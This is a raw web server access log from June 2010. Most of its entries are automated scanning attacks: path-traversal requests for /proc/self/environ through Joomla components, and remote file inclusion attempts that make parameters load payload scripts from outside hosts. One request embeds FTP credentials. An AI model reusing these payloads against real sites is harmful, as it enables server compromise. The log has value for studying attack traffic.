216.97.226.230 - - [23/Jun/2010:05:21:38 -0400] "GET /logs/access_log.Q110061500//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
216.97.226.230 - - [23/Jun/2010:05:21:38 -0400] "GET //?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.833"
216.97.226.230 - - [23/Jun/2010:05:21:39 -0400] "GET /logs//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55559 "-" "libwww-perl/5.833"
74.55.238.226 - - [23/Jun/2010:05:21:33 -0400] "GET /logs//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55559 "-" "libwww-perl/5.828"
94.136.35.223 - - [23/Jun/2010:05:21:49 -0400] "GET /logs/error_log.Q110052700///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
94.136.35.223 - - [23/Jun/2010:05:21:51 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.808"
67.15.152.183 - - [23/Jun/2010:05:21:57 -0400] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.65"
67.195.114.223 - - [23/Jun/2010:05:22:41 -0400] "GET /images/_notes/ace_bkgrd_white.jpg.mno HTTP/1.0" 200 254 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.55.238.226 - - [23/Jun/2010:05:23:23 -0400] "GET /logs/access_log.Q110060700//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.828"
83.169.36.169 - - [23/Jun/2010:05:23:33 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.caixinunes.pt/includes/js/dtree/x2??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.169.36.169 - - [23/Jun/2010:05:23:33 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.caixinunes.pt/includes/js/dtree/x2??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.169.36.169 - - [23/Jun/2010:05:23:33 -0400] "GET /logs/access_log.Q109122500//include/admin.lib.inc.php?site_path=http://www.caixinunes.pt/includes/js/dtree/x2??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.97.226.230 - - [23/Jun/2010:05:23:38 -0400] "GET /logs/access_log.Q110060700//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
95.131.67.183 - - [23/Jun/2010:05:23:53 -0400] "GET /logs/access_log.Q110052800///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
95.131.67.183 - - [23/Jun/2010:05:23:53 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
95.131.67.183 - - [23/Jun/2010:05:23:53 -0400] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
94.136.35.223 - - [23/Jun/2010:05:23:53 -0400] "GET /logs/error_log.Q110052800///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
95.131.67.183 - - [23/Jun/2010:05:24:04 -0400] "GET /logs/error_log.Q110061200///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
83.169.36.169 - - [23/Jun/2010:05:24:16 -0400] "GET /logs/access_log.Q109081500//include/admin.lib.inc.php?site_path=http://www.caixinunes.pt/includes/js/dtree/x2??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:05:24:18 -0400] "GET /logs/access_log.Q110053100//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.828"
74.55.240.242 - - [23/Jun/2010:05:24:18 -0400] "GET /index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:24:20 -0400] "GET /index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.836"
216.97.226.230 - - [23/Jun/2010:05:24:28 -0400] "GET /logs/access_log.Q110053100//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
94.136.35.223 - - [23/Jun/2010:05:24:32 -0400] "GET /logs/error_log.Q110061200///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
74.55.240.242 - - [23/Jun/2010:05:24:37 -0400] "GET /logs/access_log.Q110060900/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:24:37 -0400] "GET /index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:24:38 -0400] "GET /logs/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:24:39 -0400] "GET /logs/access_log.Q110060900/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:24:39 -0400] "GET /index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:24:39 -0400] "GET /logs/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:24:52 -0400] "GET /logs/error_log.Q110060900/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:24:53 -0400] "GET /logs/error_log.Q110060900/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.836"
95.131.67.183 - - [23/Jun/2010:05:25:07 -0400] "GET /logs/error_log.Q110052800///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
67.30.129.57 - - [23/Jun/2010:05:25:27 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:25:27 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:25:27 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:05:25:43 -0400] "GET /logs/access_log.Q110052800//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.828"
94.136.35.223 - - [23/Jun/2010:05:25:46 -0400] "GET /logs/access_log.Q110052800///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
94.136.35.223 - - [23/Jun/2010:05:25:48 -0400] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.808"
94.136.35.223 - - [23/Jun/2010:05:25:48 -0400] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.808"
67.30.129.57 - - [23/Jun/2010:05:25:48 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:25:48 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:25:48 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:25:51 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:25:51 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:25:51 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:25:52 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:25:52 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:25:52 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.249.71.209 - - [23/Jun/2010:05:25:55 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L02033C553B9449008F90094+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.15.156.75 - - [23/Jun/2010:05:26:00 -0400] "GET /logs/error_log.Q109091600//include/mail.inc.php?skin_board_path=http://www.sernageomin.cl/logs/ID-RFI.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
64.15.156.75 - - [23/Jun/2010:05:26:01 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.sernageomin.cl/logs/ID-RFI.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.810"
64.15.156.75 - - [23/Jun/2010:05:26:01 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sernageomin.cl/logs/ID-RFI.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
64.15.156.75 - - [23/Jun/2010:05:26:01 -0400] "GET /logs/access_log.Q109091600//include/mail.inc.php?skin_board_path=http://www.sernageomin.cl/logs/ID-RFI.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
216.97.226.230 - - [23/Jun/2010:05:26:06 -0400] "GET /logs/access_log.Q110052800//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
121.169.189.169 - - [23/Jun/2010:05:25:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L028AA66D40C47700D12C021+M37+ENG HTTP/1.1" 200 48625 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66543643700D7AC021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:26:14 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:26:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L028AA8664AC46600BA4C092+M37+ENG HTTP/1.1" 200 39532 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA66D40C47700D12C021+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:26:30 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
203.124.61.46 - - [23/Jun/2010:05:26:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
64.15.156.75 - - [23/Jun/2010:05:26:42 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.sernageomin.cl/logs/ID-RFI.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.810"
95.131.67.183 - - [23/Jun/2010:05:27:42 -0400] "GET /logs/access_log.Q110061300///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
74.55.238.226 - - [23/Jun/2010:05:27:59 -0400] "GET /logs/error_log.Q110053100//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.828"
95.108.245.251 - - [23/Jun/2010:05:28:02 -0400] "GET /logs/access_log.Q109102100 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
74.55.240.242 - - [23/Jun/2010:05:28:18 -0400] "GET /logs/access_log.Q110060900/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:28:18 -0400] "GET /index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:28:18 -0400] "GET /logs/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.836"
74.55.238.226 - - [23/Jun/2010:05:28:18 -0400] "GET /logs/access_log.Q110061100//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.828"
74.55.240.242 - - [23/Jun/2010:05:28:19 -0400] "GET /logs/access_log.Q110060900/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:28:19 -0400] "GET /index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:28:19 -0400] "GET /logs/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:28:21 -0400] "GET /logs/error_log.Q110060900/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.836"
74.55.240.242 - - [23/Jun/2010:05:28:23 -0400] "GET /logs/error_log.Q110060900/index.php?option=com_photobattle&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.836"
216.97.226.230 - - [23/Jun/2010:05:28:32 -0400] "GET /logs/error_log.Q110053100//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.833"
94.136.35.223 - - [23/Jun/2010:05:28:42 -0400] "GET /logs/access_log.Q110061300///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
216.97.226.230 - - [23/Jun/2010:05:28:50 -0400] "GET /logs/access_log.Q110061100//?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
67.15.152.183 - - [23/Jun/2010:05:29:28 -0400] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.65"
67.30.129.57 - - [23/Jun/2010:05:30:04 -0400] "GET /logs/access_log.Q109070300%20%20//modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:30:05 -0400] "GET /logs/access_log.Q109070300%20%20//modules/TotalCalendar/about.php?inc_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.120.226.47 - - [23/Jun/2010:05:30:29 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.120.226.47 - - [23/Jun/2010:05:30:29 -0400] "GET /logs/access_log.Q109061100///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
58.120.226.47 - - [23/Jun/2010:05:30:29 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.150.85.170 - - [23/Jun/2010:05:30:59 -0400] "GET /indek.php HTTP/1.1" 404 207 "-" "libwww-perl/5.825"
67.15.152.183 - - [23/Jun/2010:05:31:39 -0400] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.65"
209.59.12.99 - - [23/Jun/2010:05:31:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.114.223 - - [23/Jun/2010:05:31:21 -0400] "GET /logs/error_log.Q110042500 HTTP/1.0" 200 3559635 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
58.120.226.47 - - [23/Jun/2010:05:32:42 -0400] "GET /logs/access_log.Q109070700%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
58.120.226.47 - - [23/Jun/2010:05:33:06 -0400] "GET /logs/access_log.Q109070300%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
121.169.189.169 - - [23/Jun/2010:05:33:34 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L028AA86840145600CC1C092+M37+ENG HTTP/1.1" 200 43084 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028AA8664AC46600BA4C092+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
121.169.189.169 - - [23/Jun/2010:05:33:38 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4"
66.249.71.27 - - [23/Jun/2010:05:34:15 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.27 - - [23/Jun/2010:05:34:15 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L010BDD521F82C40006BC08P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.108.245.251 - - [23/Jun/2010:05:34:43 -0400] "GET /logs/access_log.Q110032700 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
174.121.176.85 - - [23/Jun/2010:05:35:34 -0400] "GET /logs/access_log.Q110060700/error.php?dir=http://www.roger-riedi.ch/fw6/language/pdf_fonts/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
64.27.19.114 - - [23/Jun/2010:05:36:46 -0400] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 259 "-" "libwww-perl/5.831"
67.15.152.183 - - [23/Jun/2010:05:38:18 -0400] "GET //*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 204 "-" "libwww-perl/5.65"
67.30.129.57 - - [23/Jun/2010:05:39:15 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:39:16 -0400] "GET /logs/error_log.Q110033000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:39:16 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:39:18 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:39:18 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:39:19 -0400] "GET /logs/error_log.Q110033000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
216.97.226.230 - - [23/Jun/2010:05:39:32 -0400] "GET //?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.833"
74.55.238.226 - - [23/Jun/2010:05:39:36 -0400] "GET //?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.828"
64.27.19.114 - - [23/Jun/2010:05:39:36 -0400] "GET /logs/access_log.Q110010400//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 286 "-" "libwww-perl/5.831"
64.27.19.114 - - [23/Jun/2010:05:39:37 -0400] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 259 "-" "libwww-perl/5.831"
64.27.19.114 - - [23/Jun/2010:05:39:37 -0400] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 264 "-" "libwww-perl/5.831"
209.59.12.99 - - [23/Jun/2010:05:39:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.27.19.114 - - [23/Jun/2010:05:39:46 -0400] "GET /logs/access_log.Q110060700//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 286 "-" "libwww-perl/5.831"
74.55.238.226 - - [23/Jun/2010:05:39:53 -0400] "GET /logs/access_log.Q110061500//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.828"
74.55.238.226 - - [23/Jun/2010:05:39:53 -0400] "GET //?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.828"
187.10.123.179 - - [23/Jun/2010:05:39:54 -0400] "GET /logs/access_log.Q109100200ftp:/baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/test.php? HTTP/1.1" 404 289 "-" "-"
200.202.243.41 - - [23/Jun/2010:05:39:54 -0400] "GET /logs/access_log.Q110010400//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 286 "-" "libwww-perl/5.813"
74.55.238.226 - - [23/Jun/2010:05:39:53 -0400] "GET /logs//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55559 "-" "libwww-perl/5.828"
200.202.243.41 - - [23/Jun/2010:05:39:55 -0400] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 259 "-" "libwww-perl/5.813"
200.202.243.41 - - [23/Jun/2010:05:39:55 -0400] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 264 "-" "libwww-perl/5.813"
200.202.243.41 - - [23/Jun/2010:05:39:57 -0400] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 259 "-" "libwww-perl/5.813"
74.55.238.226 - - [23/Jun/2010:05:40:08 -0400] "GET /logs/access_log.Q110061500//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.828"
74.55.238.226 - - [23/Jun/2010:05:40:08 -0400] "GET //?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.828"
74.55.238.226 - - [23/Jun/2010:05:40:08 -0400] "GET /logs//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55559 "-" "libwww-perl/5.828"
200.202.243.41 - - [23/Jun/2010:05:40:12 -0400] "GET /logs/access_log.Q110060700//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 286 "-" "libwww-perl/5.813"
216.97.226.230 - - [23/Jun/2010:05:40:23 -0400] "GET /logs/access_log.Q110061500//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
216.97.226.230 - - [23/Jun/2010:05:40:24 -0400] "GET //?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.833"
216.97.226.230 - - [23/Jun/2010:05:40:24 -0400] "GET /logs//?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55559 "-" "libwww-perl/5.833"
67.30.129.57 - - [23/Jun/2010:05:40:37 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:40:37 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:05:40:37 -0400] "GET /logs/error_log.Q109090800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
